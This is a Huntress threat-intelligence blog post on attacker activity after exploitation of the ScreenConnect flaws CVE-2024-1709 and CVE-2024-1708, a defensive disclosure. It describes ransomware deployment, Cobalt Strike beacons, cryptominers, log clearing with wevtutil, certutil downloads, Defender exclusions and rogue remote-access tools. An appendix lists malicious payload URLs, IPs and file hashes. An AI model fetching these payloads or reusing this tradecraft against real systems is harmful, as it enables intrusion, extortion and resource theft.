SlashAndGrab: ScreenConnect Post-Exploitation in the Wild (CVE-2024-1709 & CVE-2024-1708)

Contributors:
Special thanks to our Contributors:
Glitch effectGlitch effectGlitch effect
Glitch banner

Table of Contents: 

Since February 19, Huntress has been sharing technical details of the ScreenConnect vulnerability we’re calling “SlashAndGrab.” In previous posts, we shared the details of this vulnerability, its exploit, and shared detection guidance.

In this article, we’ve collected and curated threat actor activity fresh from the Huntress Security Operations Center (SOC), where our team has detected and kicked out active adversaries leveraging ScreenConnect access for post-exploitation tradecraft.

The adversaries taking advantage of this vulnerability have been VERY busy. There is a lot to cover here, so buckle up and enjoy some tradecraft! 

Adversaries Deploying Ransomware 

A number of adversaries leveraged their newly ill-gotten ScreenConnect gains to deploy ransomware. 

LockBit

With the impressive joint international takedown efforts to disrupt the LockBit ransomware group, many are asking how “LockBit” is still relevant. The LockBit deployments that we’ve seen are invoked with an encryptor that looks to be compiled around September 13, 2022—which is the same timeline as the leaked LockBit 3.0 builder in the past. One observed filename is classic LB3.exe, which again, matches the canned and publicly leaked builder.

We believe this is an important distinction. While the malware deployed appears associated with LockBit, there is no evidence we’ve seen suggesting the joint international takedown efforts are anything short of a landmark milestone to disrupt one of the largest and most active ransomware groups in the world.

Loading Gist...
Figure 1: Example of LockBit ransomware executed through ScreenConnect

We’ve included the resulting ransom note associated with the above executable. 

Figure 2: Ransomware note 

Other Ransomware Attempts

We observed other ransomware attempts, like upd.exe and svchost.exe, that Microsoft Defender consistently neutralized.

We also observed adversaries leverage certutil downloaded ransomware .MSI payloads, which they also made persistent via startup folders.

Loading Gist...
Figure 3: Example of ransomware added as a persistence mechanism

The ransom note from the threat actor who deployed the MSI has been included as well. 

Figure 4: Example ransomware note

Ransomware Anti-Forensics

Ransomware actors also tried to remove event logs via wevtutil.exe cl to frustrate investigators' analysis at a later time. Fortunately, Huntress Managed EDR is far too perceptive to entertain adversarial frustration. 😉 

Figure 5: Example execution of wevtutil.exe log clearing via ScreenConnect

Adversaries Enumerating

There was a particular adversary, using 185.62.58[.]132, executing a script on compromised systems across multiple unique victim networks. The intent of the script was to identify which of their compromised systems with the highest privileges.

We believe this demonstrates the scale with which threat actors are abusing this vulnerability as they are working to automate their understanding of where to take additional, post-compromise actions moving forward. 

Loading Gist...
Figure 6: Adversary enumerating the user they control via ScreenConnect 
Figure 7:  Adversary enumerating the user they control via ScreenConnect 

Adversary Cryptocurrency Miners

Somewhat disappointing for a lack of originality, a significant number of adversaries used their ScreenConnect access to deploy cryptocurrency coin miners.

There was a particularly entertaining attempt to masquerade a coinminer as a legitimate SentinelOne file. 

Loading Gist...
Figure 8: Creation of a coinminer masquerading as SentinelOne

We also observed adversaries downloading and using a xmrig cryptominer, with further details below. 

Adversaries Installing Additional Remote Access

Adversaries seemed to commonly install additional, “legitimate” remote access tools, likely as an attempt to remain persistent even once the ScreenConnect fiasco has been cleared up. 

Simple Help

An adversary we observed installed the Simple Help RMM, from their ScreenConnect initial access.

We observed the Simple Help RMM agent deployed in the following directories:

  • C:\\Users\\oldadmin\\Documents\\Maxx Uptime remote connection\\Files\\agent.exe\
  • C:\\ProgramData\\JWrapper-Remote Access\\JWAppsSharedConfig\\restricted\\SimpleService.exe
  • C:\\Users\\oldadmin\\Documents\\MilsoftConnect\\Files\\ta.exe
  • C:\Windows\spsrv.exe

We also observed a configuration file dropped to C:\\ProgramData\\JWrapper-Remote Access\\JWAppsSharedConfig\\serviceconfig.xml, which revealed it was configured to communicate to the public IPv4 91.92.240[.]71.

The user oldadmin was observed being used running similar commands across multiple unique victim organizations.

Figure 9: Execution of Simple Help RMM Agent

SSH

This threat actor leveraged their ScreenConnect access to download and run an SSH backdoor, seemingly to facilitate an RDP connection. 

Loading Gist...
Figure 10: Huntress report for the aforementioned ssh backdoor

Google Chrome Remote Desktop

We also observed an adversary do something quite interesting with Google Chrome’s Remote Desktop. They pulled the installer directly from Google infrastructure, which stores it as a service—no doubt in the hopes they could persistently and remotely access the environment via a second GUI remote access tool (we enjoy crushing hacker hopes here at Huntress).  

Loading Gist...
Figure 11: Attempted download of Google Chrome’s Remote Desktop client
Figure 12: Huntress platform detecting the persistent installation of Google Chrome’s Remote Desktop client

Downloading Tools and Payloads

A common tradecraft denominator between the adversaries we observed involved them downloading further tools and payloads.

For example, an adversary leveraged PowerShell’s Invoke-WebRequest (iwr) to call on additional payloads for their SSH persistent tunnel.

Loading Gist...
Figure 13: Attempted PowerShell cradle download invocation to grab additional post-exploitation tools for SSH tunneling

We also observed an adversary download the SimpleHelp RMM via curl and rename the executables to .png’s in an attempt to evade detection (spoiler: they did not evade detection). 

Loading Gist...
Figure 14: SimpleHelp RMM renamed to sun.png, accessed via curl download

There was also this straightforward PowerShell downloading activity. However, the file was deleted, and their infrastructure was offline, meaning the file’s intent had not been determined. 

Loading Gist...

Download Evasion

We also observed adversaries leverage LOLBINs like certutil to download their payloads, likely in an attempt to fly under the radar.

Loading Gist...

Some adversaries maliciously modified the AV on the host before downloading their payloads. In this specific example, svchost.exe was deleted before analysis could be conducted. 

Loading Gist...
Figure 15: Evidence of a malicious payload download with defense evasion attempt

Adversaries also used their ScreenConnect sessions to reach out and download Cobalt Strike beacons from their external infrastructure. Specifically, this threat actor saved their beacon as a .PDF on a web server, renaming it to a .DAT on the targeted machine.

Loading Gist...
Figure 16: Evidence of Cobalt Strike payload download

Transfer.sh

Interestingly, we observed an adversary mass download cryptocurrency miners using the temporary file upload website transfer.sh.

Loading Gist...

Excerpt of the script (full script in the Appendix): 

Loading Gist...
Figure 17: PowerShell invocation of malicious script downloaded from Transfer.sh

Adversaries Dropping Cobalt Strike

Unsurprisingly, many adversaries attempted to drop and run a Cobalt Strike beacon on the host. 

Loading Gist...
Figure 18: Setting exclude directory in Windows Defender for the Cobalt Strike beacon
Figure 19: Execution of Cobalt Strike

It’s also worth noting that Defender thwarted many of these attempts, as seen in Figure 20.

Figure 20: Evidence of Windows Defender neutralizing the Cobalt Strike beacon originating from the ScreenConnect session

It was also common to see the same adversaries drop the (earlier mentioned SentinelUI) cryptocurrency miner and attempt a Cobalt Strike beacon, which Windows Defender would neutralize. 

Figure 21: Evidence of cryptominers and Cobalt Strike being neutralized by Defender

Adversaries Persisting

Adversaries, of course, want to persist in an environment, beyond their initial access method—and for good reason. This ScreenConnect vulnerability had rapid mitigations suggested by Huntress and ConnectWise that would have undermined the adversary’s access. 

Creating New Users

Our SOC observed a number of adversaries prioritize creating their own users, once they landed on a machine, using naming conventions that would attempt to fly under the radar, as well as add these to highly privileged groups.

Loading Gist...
Figure 22: Evidence of adding a new user

Persistent Reverse Shell

The SOC also observed an adversary transfer a C:\\perflogs\\RunSchedulerTaskOnce.ps1 from the ScreenConnect compromised, as confirmed from analysis of Windows Event Log’s Application.evtx - Event ID 0.

Loading Gist...
Figure 23: PowerShell execution of malicious script PowerShell script that included an encoded a Driver.dll

The script was in fact deleted, but could be partially restored by taking the PowerShell Operational EVTX and running this script, which re-stitched the script back together from its ScriptBlockId (excerpt of script below).

Figure 24: Extract of  PowerShell code from PowerShell Operational EVTX
Figure 25: Extract of deobfuscated PowerShell code from CyberChef

This would download a driver.dll, and leverage WMI Event Consumer / PwSH persistence (named System__Cmr).

Figure 26: Evidence of the encoded script’s persistence mechanism in the Huntress platform

Wrapping Up

This incredibly interesting ScreenConnect exploit has enamored many of us at Huntress for the last few days, but it’s a shame our adversaries didn’t commit to pairing this new exploit with new tradecraft.

It’s worth driving this point home: most of the post-compromise activities we have documented in this article aren’t novel, original, or outstanding. Most threat actors simply don’t know what to do beyond the same usual, procedural tradecraft; cybercriminals are rarely sophisticated, and the infosec community can beat them together.

Adversaries will default to their “tried and true” methods. An experienced, talented security team can neutralize most threat actors in the middle of their campaigns with ease. We hope this article inspires your security mindset. If you need any help monitoring for activity related to this vulnerability, you can use Huntress' free trial.

If you’re interested in more, come and check out the next episode of our Product Lab webinar, where we’ll be sharing even more technical details behind this threat and answer any questions from the community.

Appendix

ATT&CK

TacticTechniqueDescription
Initial AccessT1190: Exploit Public-Facing ApplicationAdversaries are leveraging a path traversal bug and auth bypass in ScreenConnect that allows them to create a privileged account for remote control.
DiscoveryT1087: Account DiscoveryAdversaries are attempting to discover privileged users by running a script across compromised systems.
Defense EvasionT1562.001: Disable or Modify ToolsAdversaries are attempting to evade detection by adding exclusion paths to Windows Defender using PowerShell.
Defense EvasionT1070.001: Clear Windows Event LogsRansomware actors attempt to remove event logs using wevtutil.exe cl command to hinder forensic analysis.
Execution T1059: Command and Scripting Interpreter
T1059.001: Powershell
T1059.003: Windows Command Shell
Adversaries are using PowerShell and CMD to download and execute scripts from remote locations, facilitating various activities such as cryptocurrency mining and remote access.
PersistenceT1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup FolderAdversaries stored their MSI ransomware payload in the Public startup folder
PersistenceT1136: Create AccountAdversaries created new users and in some instances added them to privileged groups.
PersistenceT1053: Scheduled TaskAdversaries are creating scheduled tasks for their cryptominers and remote access
PersistenceT1546.003: Event Triggered Execution: Windows Management Instrumentation Event SubscriptionAdversaries are modifying the registry to achieve persistence by adding WMI Event Consumers.
PersistenceT1133: External Remote ServicesAdversaries are compromising ScreenConnect instances, deploying SSH tunnels, Chrome remote desktops, and alternate RMMs for evasive, persistent remote access
Command and ControlT1105: Ingress Tool TransferAdversaries are downloading files using curl, certutil, and Invoke-WebRequest.
Command and ControlT1572: Protocol TunnelingAdversaries created SSH tunnels for communication.
ImpactT1496: Resource HijackingCryptocurrency miners are being deployed by adversaries
ImpactT1486: Data Encrypted for ImpactAdversaries deployed ransomware via compromised ScreenConnect
SoftwareS0154: Cobalt StrikeAdversaries are leveraging Cobalt Strike beacons to achieve C2 connections to compromised ScreenConnect machines.

IoCs

IoC TypeIndicatorHash
RansomwareC:\Windows\TEMP\ScreenConnect\22.5.7881.8171\LB3.exe78a11835b48bbe6a0127b777c0c3cc102e726205f67afefcd82f073e56489e49
Ransomwarehttp[:]//23.26.137[.]225:8084/msappdata.msi c:\mpyutd.msi8e51de4774d27ad31a83d5df060ba008148665ab9caf6bc889a5e3fba4d7e600
RansomwareUPX.exe2da975fee507060baa1042fb45e8467579abf3f348f1fd37b86bb742db63438a
Ransomwaresvchost.exea50d9954c0a50e5804065a8165b18571048160200249766bfa2f75d03c8cb6d0
Cryptocurrency Minerhxxps[://]transfer[.]sh/GElU1LmvbS/injcet.ps1ec49f5033374eb8f533e291111e1433e2da127f45857aebbbe614e711b3ca989
Cobalt Strikehxxp[://]minish[.]wiki[.]gd/c[.]pdfC:\programdata\update[.]dat0a492d89ea2c05b1724a58dd05b7c4751e1ffdd2eab3a2f6a7ebe65bf3fdd6fe
Cobalt StrikeC:\perflogs\RunSchedulerTaskOnce.ps16065fee2d0cb0dc7d0c0788e7e9424088e722dfcf9356d20844d7b2d75b20163
Cobalt Strikecopy.exe81b4a649a42a157facede979828095ccddcdf6cec47e8a3156530e0c02e9625e
Google Chrome Remote Desktophttps://dl.google.com/edgedl/chrome-remote-desktop/chromeremotedesktophost.msiC:\ProgramData\1.msic47bfe3b3eccc86f87d2b6a38f0f39968f6147c2854f51f235454a54e2134265
SimpleHelp RMMhttps[:]//cmctt.]com/pub/media/wysiwyg/sun.pngC:\Windows\spsrv.exee8c48250cf7293c95d9af1fb830bb8a5aaf9cfb192d8697d2da729867935c793
SimpleHelp RMMcmctt[.]com/pub/media/wysiwyg/invoke.png37a39fc1feb4b14354c4d4b279ba77ba51e0d413f88e6ab991aad5dd6a9c231b
SimpleHelp RMMC:\Users\oldadmin\Documents\Maxx Uptime remote connection\Files\agent.exea0fd0ceb95e775a48a95c00eab42fa5bb170f552005c38812fd03ab4cc14932e
SimpleHelp RMMC:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\serviceconfig.xml2e0df44dd75dbdbd70f1a777178ad8a1867cf0738525508b6120ba21f4505f47
SimpleHelp RMM IPv491.92.240[.]71
SSH Scriptd69c7fc246c4867f070e1a7b80c7c41574ee76ab54a8b543a1e0f20ce4a0d5cde
SSH ScriptZ.zipaa9f5ed1eede9aac6d07b0ba13b73185838b159006fa83ed45657d7f333a0efe
Beacondriver.dll6e8f83c88a66116e1a7eb10549542890d1910aee0000e3e70f6307aae21f9090
Unknown159[.]65[.]130[.]146:4444/svchost.exeC:\Windows\Temp\svchost.exe
Cryptocurrency Minerhttp://185[.]232[.]92[.]32:8888/SentinelUI.exe
Cryptocurrency Minerhxxps[://]transfer[.]sh/s27p8BcTxi/config12[.]json
Cryptocurrency Minerhxxps[://]transfer[.]sh/ojw6aKoA4A/config11[.]json
Cryptocurrency Minerhxxps[://]transfer[.]sh/8l4d5qR39o/config9[.]json
Cryptocurrency Minerhxxps[://]transfer[.]sh/xkIMWnocQH/config8[.]json
Cryptocurrency Minerhxxps[://]transfer[.]sh/Db5eUfqKP9/config7[.]json
Cryptocurrency Minerhxxps[://]transfer[.]sh/L1e30KShXP/config6[.]json
Cryptocurrency Minerhxxps[://]transfer[.]sh/w2Y0iuEKiY/config5[.]json
Cryptocurrency Minerhxxps[://]transfer[.]sh/6bkwRh4NXd/config4[.]json
Cryptocurrency Minerhxxps[://]transfer[.]sh/PRBRzMMEKC/config3[.]json
Cryptocurrency Minerhxxps[://]transfer[.]sh/RWSn6NLIr7/config2[.]json
Cryptocurrency Minerhxxps[://]transfer[.]sh/MRFibhy8fS/config1[.]json
Cryptocurrency Minerhxxps[://]transfer[.]sh/FeDRSFU5XV/config[.]json

Contents of inject.ps1 - Crypto Currency Miner

Loading Gist...

Acknowledgments

Thank you to the following Huntress SOC analysts for their triage and reporting of the various adversarial activities included in this report: Adrian Garcia, Amelia Casley, Chad Hudson, Dani Dayal, Christopher ‘Dipo’ Rodipe, Dray Agha, Faith Stratton, Herbie Zimmerman, Izzy Spering, Jai Minton, John ‘JB’ Brennan, Jordan Sexton, Josh Allman, Mehtap Ozdemir, Michael Elford, Stephanie Fairless, Susie Faulkner, Tim Kasper.

Special thanks to Josh Allman and Dray Agha for further analysis, and collecting and curating this blog.

Share

Sign Up for Huntress Updates

Get insider access to Huntress tradecraft, killer events, and the freshest blog updates.

By submitting this form, you accept our Terms of Service & Privacy Policy
Oops! Something went wrong while submitting the form.
Huntress at work